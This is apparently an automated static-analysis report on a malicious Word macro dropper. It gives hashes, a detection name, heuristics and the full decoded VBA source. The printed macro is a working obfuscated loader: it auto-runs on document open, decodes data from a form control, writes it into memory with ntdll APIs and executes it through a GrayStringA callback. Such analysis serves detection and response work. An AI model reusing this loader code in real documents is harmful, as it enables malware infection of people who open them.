Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 780a5096b52f1831…

MALICIOUS

Office (OLE)

Size: 180.5 KB · Created: 2017-02-28 12:28:00 · Authoring application: Microsoft Office Word · First seen: 2017-03-05
MD5: 3ba2aea8ca693ace3bed4d1890349b90 SHA-1: a7749c56f8fcd35dd6150d6d452967134abd6d5f SHA-256: 780a5096b52f18316eeb93aa8a8e17cd7f8372f3dae08094bff39acae457fdc9
Risk score: 90

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

ClamAV identifies the file as malicious with the signature 'Doc.Dropper.ZwMacros-6057750-0', indicating a macro-based dropper. The presence of a 'Document_Open' macro supports this: it is a common technique for running code automatically when the document is opened. The VBA code is heavily obfuscated (dictionary-word identifiers, dead arithmetic and unused SYD/NPer calls, and lyric-style comment lines between declarations), but its structure suggests it is intended to download and execute a second-stage payload. Note that the decoded macro preview contains no URL string or download routine; what it does show is the 'electrolyze' module declaring ntdll NtAllocateVirtualMemory and ZwWriteVirtualMemory together with User32 GrayStringA (among several other declared API imports), and the 'empiricism' routine reading a value from 'megaptera.lari.SelectedItem' (apparently a UserForm control), decoding it with 'electrolyze.rut' and passing the result to 'fry', which calls those memory APIs — a pattern consistent with staging the payload in memory rather than dropping a file. For response and detection purposes, the encoded payload therefore does not appear in the macro text itself; recovering it requires extracting the stored data of the 'megaptera' form, and VBA modules that declare ntdll memory functions are the strongest static indicator in this sample.

Heuristics (4)

  • ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    Dim critically As Byte
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. The seven URLs listed below are XMP/RDF metadata namespace identifiers (Adobe XMP, Dublin Core, RDF syntax) found in the document body, typically carried by an embedded image's metadata; none of them is referenced by the extracted macro code, so they should not be treated as network indicators for this sample.
    URL (each found in document text, OLE body):
    • http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15397 bytes
SHA-256: fa12b2087bd41537f0fc543f6c942170aedac9db9c291b0abc770e1628550701
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim critically As Byte
Dim constitutionally As Variant
bury = "plantae"
unlubricated = "ommastrephes"
empiricism
implosion = 4
antilepton = 282
daylight = 37113
chide = 126260
chide = SYD(chide, daylight, antilepton, implosion)
End Sub
Function fry(grandiose)
Dim sandbank As Integer
Dim hesperis As String
Dim purgation As String
Dim arthrosporic As Variant
#If Win64 > 0 Then
Dim lemoncolored As String
Dim ornithologist As LongPtr
disinter = 77 - 44 - 25
Dim canadian As LongPtr
Dim narthecium As Byte
Dim halophile As Variant
Dim basidiosporous As LongPtr
Dim sed As Byte
#Else
Dim oppressor As Long
Dim ornithologist As Long
disinter = 1 + 3
Dim canadian As Long
Dim eugenia As Integer
Dim basidiosporous As Long
Dim sheeplike As String
Dim commonality As Variant
#End If
occupation = VarPtr(ornithologist)
continue = recurvity(occupation, VarPtr(grandiose) + 8, disinter)
blolly = 124 + 92 - 217
canadian = 116 - 112 + 62 - 66
mizzenmast = 59 + 52 - 111
basidiosporous = 9874
bombycid = 125 + 1 - 118 + 4088
baas = 117 - 4 - 97 + 48
marmoreal = promulgate(ByVal blolly, canadian, ByVal mizzenmast, basidiosporous, ByVal bombycid, ByVal baas)
overhaul = Rnd(368)

fattened = analyze + 126

recurvity canadian, ornithologist, 4384
mahogany = 29
amice = 16926
trochaic = 313013
reputableness = NPer(59 / 787, mahogany, -17553, trochaic, 1)

fry = canadian
End Function
Sub pageNumber()
    ActiveDocument.Sections(ActiveDocument.Sections.Count) _
        .Headers(wdHeaderFooterPrimary).Range.Select
    With Selection
        .Paragraphs(1).Alignment = wdAlignParagraphCenter
        .TypeText Text:="Page "
        .Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
            "PAGE ", PreserveFormatting:=True
        .TypeText Text:=" of "
        .Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
            "NUMPAGES ", PreserveFormatting:=True
    End With
End Sub

Function recurvity(bishopric, publicist, crapulous)
#If Win64 Then
Dim nystatin As String
Dim chichi As Integer
Dim unromantically As LongPtr
Dim secretarial As LongPtr
Dim patera As LongPtr
Dim birdie As Integer
Dim assamese As LongPtr
Dim maidan As LongPtr
#Else
Dim secretarial As Long
Dim onondaga As String
Dim unromantically As Long
Dim thermonuclear As String
Dim assamese As Long
Dim bungaloid As String
Dim patera As Long
Dim cuckoldom As String
Dim maidan As Long
Dim champ As Integer
Dim gelechiidae As Long
#End If
epigrammatic = "indigofera"
analyze = Fix(66)
secretarial = bishopric
maidan = crapulous
analyze = Fix(105)
assamese = publicist
clouded = 7
sapere = 191
antitussive = 11429
crouton = 447046
crouton = SYD(crouton, antitussive, sapere, clouded)

epigrammatic = "communal"
unromantically = 58 - 8 + 120 - 171
reluct ByVal unromantically, secretarial, assamese, maidan, patera
fattened = overhaul + 96
End Function
Sub empiricism()
Dim gaping As Integer
Dim naranjilla As Variant
implanted = ThisDocument.ComputeStatistics(Statistic:=wdStatisticPages)
megaptera.lari.Value = implanted + 9
snout = "quad" & "ripart" & "ite"
copycat = "decker"
Set announce = megaptera.lari.SelectedItem
unrefined = 5
disvaluation = 160
tarn = 23456
bravissimo = 301721
bravissimo = SYD(bravissimo, tarn, disvaluation, unrefined)

oxylebius = announce.Name
carthaginian = 71 - 21 - 25 + 5819
builder = Right(oxylebius, carthaginian)
catchpoll = electrolyze.rut(builder)
finishing = 5
buckram = 362
sieve = 57794
broomcorn = 440744
broomcorn = SYD(broomcorn, sieve, buckram, finishing)

hymenophyllaceae = "alliaria"
#If Win64 Then
Dim rascal As String
Dim events As LongPtr
Dim entangled As LongPtr
Dim enchiridion As Byte
#Else
Dim ballyhoo As Byte
Dim entangled As Long
Dim cheeseparing As String
Dim events As Long
#End If
crassulaceae = 0
deviating = "defrayment"
busy = 30 + 38 + 4028
dicer = 55
sommelier = 2051
anisogamy = 417658
infarct = NPer(73 / 362, dicer, -26037, anisogamy, 1)

crony = "ps" & "ychi" & "atric"
blarina = "cattleship"
hommes = "bacchanal"
heartexpanding = 5
astronomer = 287
beaut = 47676
booksellers = 333154
booksellers = SYD(booksellers, beaut, astronomer, heartexpanding)

siccity = catchpoll
citizenship = "handed"
ajuga = "hornless"
events = fry(siccity)
headmaster = "de" & "rnier"
#If Win64 Then
Dim riot As String
Dim testaceous As LongPtr
pollachius = "undertide"
tufted = "advertent"
Dim selfgenerated As LongPtr
graphomania = 12 - 63 + 124 + 1239
#Else
betongue = "quietly"
manicurist = "le" & "pism" & "a"
circumrotatory = "ludo"
Dim testaceous As Long
dermacentor = 67 - 83 + 511
Dim selfgenerated As Long
graphomania = dermacentor + 2659

#End If
Dim sacrosanct As String
Dim besetting As Integer
testaceous = 20 + 75 - 95
entangled = events + graphomania
selfgenerated = 75 + 89 - 112 - 51
gummosis = borscht(selfgenerated, selfgenerated, entangled, testaceous, selfgenerated, testaceous, testaceous, testaceous, testaceous)
beginning = 64
phone = 23004
usefulness = 475794
chinchilla = NPer(44 / 442, beginning, -28951, usefulness, 0)

End Sub



Attribute VB_Name = "electrolyze"
'  Now tell me what got two thumbs and knows how to spit rhymes
'  How rude, Stephanie Tanner
#If Win64 Then
'  Tell em open wide when they see how I'm flossing, ching
'  First CD out sold a Sam Gooding
Public Declare PtrSafe Function promulgate Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (doublefaced As LongPtr, azerbaijan As LongPtr, ByVal lithe As LongPtr,napkinByVal As LongPtr, materialistically As LongPtr, ByVal bitewing As LongPtr) As LongPtr
'  Hands in the sky like
'  Work ethic harder than a Mexican
Public Declare PtrSafe Function reluct Lib "Ntdll.dll  " Alias "ZwWriteVirtualMemory" (ByVal assignation As Any, ByVal orthodontist As Any, ByVal monogynous As Any, ByVal sequester As Any, ByVal amaritude As Any) As LongPtr
'  Now tell me what got two thumbs and knows how to spit rhymes
'  I'm A-W-E, some call me awesome
Public Declare PtrSafe Function chiwere Lib "Shlwapi.dll" Alias "PathFileExists" (poultice As LongPtr) As LongPtr
'  First CD out sold a Sam Gooding
'  Like I feel so awesome
Public Declare PtrSafe Function mastaba Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (aecium As LongPtr, abridge As Any,enteritis As LongPtr, estafette As Any) As Boolean
'  Now he's coming to America cause that boy good
'  Wanna roll
Public  Declare PtrSafe Function borscht Lib "User32.dll" Alias "GrayStringA" ( ByVal brummagem As Any, ByVal trophonius As Any, ByVal doodlesack As Any, ByVal indecisive As Any, ByVal pantie As Any, ByVal corvine As Any, ByVal persia As Any, ByVal afferent As Any, ByVal odontoid As Any) As Long
'  Semi colon dash parenthesis, text messaging
'  Work ethic harder than a Mexican
Public Declare PtrSafe Function anorectic Lib "Shell32.dll" Alias "SHGetDesktopFolder" (chloramphenicol As LongPtr)
'  I'm A-W-E, some call me awesome
'  I assume you should make room for the elephant
Public Declare PtrSafe Function cutworm Lib "Shell32.dll" Alias "SHGetSettings" (owlish As LongPtr,filicopsida As LongPtr) As LongPtr
'
'  Wayne's World excellent
Public Declare PtrSafe Function archosaurian Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal perquisite As LongPtr,decision As LongPtr,macrouridae As LongPtr,rightist As LongPtr,agreed As LongPtr) As Boolean
'  I'm awesome every time I lay it down
'  You don't gotta watch me but please watch your manners

'  Now he's coming to America cause that boy good
'  Al Hedison couldn't be this fly so ask how I feel and you know I reply
#Else
'  Now he's coming to America cause that boy good
'  Al Hedison couldn't be this fly so ask how I feel and you know I reply
Public Declare Function promulgate Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (muscat As Long, sentimentally As Long, ByVal catamenia As Long, libertyByVal As Long, soldiering As Long, ByVal benefits As Long) As Long
'  Now he's coming to America cause that boy good
'  Al Hedison couldn't be this fly so ask how I feel and you know I reply
Public Declare Function millstone Lib "Shlwapi.dll" Alias "PathFileExists" (blewits As Long) As Long
'  Now he's coming to America cause that boy good
'  Al Hedison couldn't be this fly so ask how I feel and you know I reply
Public Declare Function reluct Lib "Ntdll.dll   " Alias "ZwWriteVirtualMemory" (ByVal onychomancy As Any, ByVal charcuterie As Any, ByVal auriculariaceae As Any, ByVal spatangoida As Any, ByVal ideality As Any) As Long
'  Now he's coming to America cause that boy good
'  Al Hedison couldn't be this fly so ask how I feel and you know I reply
Public Declare Function positive Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal mistflower As Long, mourn As Long, delightfully As Long, ventriloquist As Long, hindshank As Long) As Boolean
'  Now he's coming to America cause that boy good
'
Public Declare Function borscht Lib "User32.dll" Alias "GrayStringA" (ByVal hunnemannia As Any, ByVal achromatism As Any, ByVal monodrame As Any, ByVal axil As Any, ByVal effaced As Any, ByVal curricular As Any, ByVal derailment As Any, ByVal der As Any, ByVal hamburg As Any) As Long
'  Now tell me what got two thumbs and knows how to spit rhymes
'  I think that I kill em, play possum
Public Declare Function highsouled Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (exemplification As Long, gaudy As Any, midair As Long, particula As Any) As Boolean
'  Boom, where I come from is irrelevant
'  Tell em open wide when they see how I'm flossing, ching
Public Declare Function xiphoid Lib "Shell32.dll" Alias "SHGetSettings" (ceryle As Long, helpfully As Long) As Long
'  Tell em open wide when they see how I'm flossing, ching
'  I been on it for a while, trying to get my spot
Public Declare Function curiosity Lib "Shell32.dll" Alias "SHGetDesktopFolder" (nonenzymatic As Long)
'  How you feel
'  Death proof ride with Rosario Dawson

'  I'm A-W-E, some call me awesome
'  Death proof ride with Rosario Dawson
#End If
'  You don't wanna miss it like a very special blossom
'  Now tell me what got two thumbs and knows how to spit rhymes
Function rut(baggageman) As String
Dim ade() As Byte
balderdash = "acerola"

Dim bloke As String
Dim inseparability As String

Dim onetrillionth(63) As Long
Dim allegeable As Long
Dim plumbaginales As Long
Dim spontaieous As Long

Dim gamopetalous(6965) As Byte
Dim apia As Long
Dim bettering As Integer

analyze = Rnd(169)

Dim ideawake As Long
Dim adorable(63) As Long
epigrammatic = epigrammatic

Dim embroider As Integer
Dim onesixth As Long

Dim architrave(63) As Long
stodgy = 4096
Dim bauble As Variant

maxime = 4032
ballpark = 256
panicled = 258048
vying = 56 + 7
semestral = 65280
Dim formally As Variant

treacle = 42 + 262102
crumbled = 35 + 16711645
poorly = 48 - 51 + 258
metencephalon = 68 + 16515004
neurotically = 65536
agonism = 128 + 48 - 112
Dim barkantine As Variant

Dim rainfall As Integer
creak = 0
awed = 5843
Dim hortatory() As Byte
Dim bloodsucking As Variant
hortatory = VBA.Strings.StrConv(baggageman, vbFromUnicode)
Dim oxbow As Variant
flyleaf = 8
feverish = 190
seductor = 51994
edmontonia = 375467
edmontonia = SYD(edmontonia, seductor, feverish, flyleaf)

approachability = 5843
interminably = 2 + Sqr(RGB(0, 1, 0))
For summons = 0 To approachability
If summons Mod 2 = 0 Then
hortatory(summons) = hortatory(summons) + interminably
Else
hortatory(summons) = hortatory(summons) + interminably - 1
End If
Next summons
predestination = 105
conidiophore = 13441
gopher = 143747
afford = NPer(74 / 400, predestination, -37172, gopher, 0)

embroider = 0
scruple = 46 - 92 + 46
primateship = 25 - 83 + 33 + 68
mellifluous = inquisitorial
For plumbaginales = 0 To 63
onetrillionth(plumbaginales) = antifungal(plumbaginales, agonism, 32)
architrave(plumbaginales) = antifungal(plumbaginales, stodgy, 32)
adorable(plumbaginales) = antifungal(plumbaginales, treacle, 32)
Next plumbaginales
scowling = 52
chancre = 15902
dacoit = 570520
georgian = NPer(46 / 793, scowling, -39112, dacoit, 1)

ade = hortatory
cladrastis = 4
phaeton = 20
midway = 16367
notoryctidae = 517252
nagi = NPer(67 / 610, phaeton, -9838, notoryctidae, 0)

cero = 3
analyze = Rnd(379)

balderdash = epigrammatic

millionfold = cero + 1
adenopathy = 2
For apia = 0 To approachability
centrist = ade(apia)
immaculately = ade(apia + 2)
allegeable = adorable(mellifluous(centrist)) _
 + architrave(mellifluous(ade(apia + 1))) + onetrillionth(mellifluous(immaculately)) + mellifluous(ade(apia + cero))
plumbaginales = antifungal(allegeable, crumbled, 24)
gamopetalous(ideawake) = antifungal(plumbaginales, neurotically, 14)
plumbaginales = antifungal(allegeable, semestral, 24)
gamopetalous(ideawake + 1) = antifungal(plumbaginales, ballpark, 14)
gamopetalous(ideawake + adenopathy) = antifungal(allegeable, poorly, 24)
ideawake = ideawake + adenopathy + 1
apia = apia + 3
Next
rut = gamopetalous
End Function

Public Sub DynamicBubble()
    Dim tempVar As Integer
    Dim anotherIteration As Boolean
    Dim I As Integer
    Dim arraySize As Integer
    Dim myArray() As Integer
    Do
        arraySize = I
        I = I + 1
    Loop Until Cells(I, "A").Value = ""
    ReDim myArray(arraySize - 1)
    For I = 1 To arraySize
        myArray(I - 1) = Cells(I, "A").Value
    Next I
    Do
        anotherIteration = False
        For I = 0 To arraySize - 2
            If myArray(I) > myArray(I + 1) Then
                tempVar = myArray(I)
                myArray(I) = myArray(I + 1)
                myArray(I + 1) = tempVar
                anotherIteration = True
            End If
        Next I
    Loop While anotherIteration = True
    '
    For I = 1 To arraySize
        Cells(I, "B").Value = myArray(I - 1)
    Next I
End Sub

Function inquisitorial()
Dim zosteraceae(255) As Byte
wax = 63 - 82 + 84
Do
zosteraceae(wax) = wax - 65
wax = wax + 1
Loop Until wax = 91
wax = 48
Do
zosteraceae(wax) = wax + 4
wax = wax + 1
Loop Until wax = 58
wax = 97
Do
zosteraceae(wax) = wax - 71
wax = wax + 1
Loop Until wax = 123
zosteraceae(47) = 63
wax = 43
zosteraceae(wax) = 62
inquisitorial = zosteraceae
End Function
Function antifungal(braille, berserker, groin)
Select Case groin
Case 14
antifungal = braille \ berserker
Case 24
antifungal = braille And berserker
Case 32
antifungal = braille * berserker
End Select
End Function
Function good(commination)
good = AscW(commination)
End Function


Attribute VB_Name = "megaptera"
Attribute VB_Base = "0{F197168D-4BC7-4C24-A141-C19D3ABF718E}{7989A6A1-9294-40F8-8A29-8F197F518FEC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False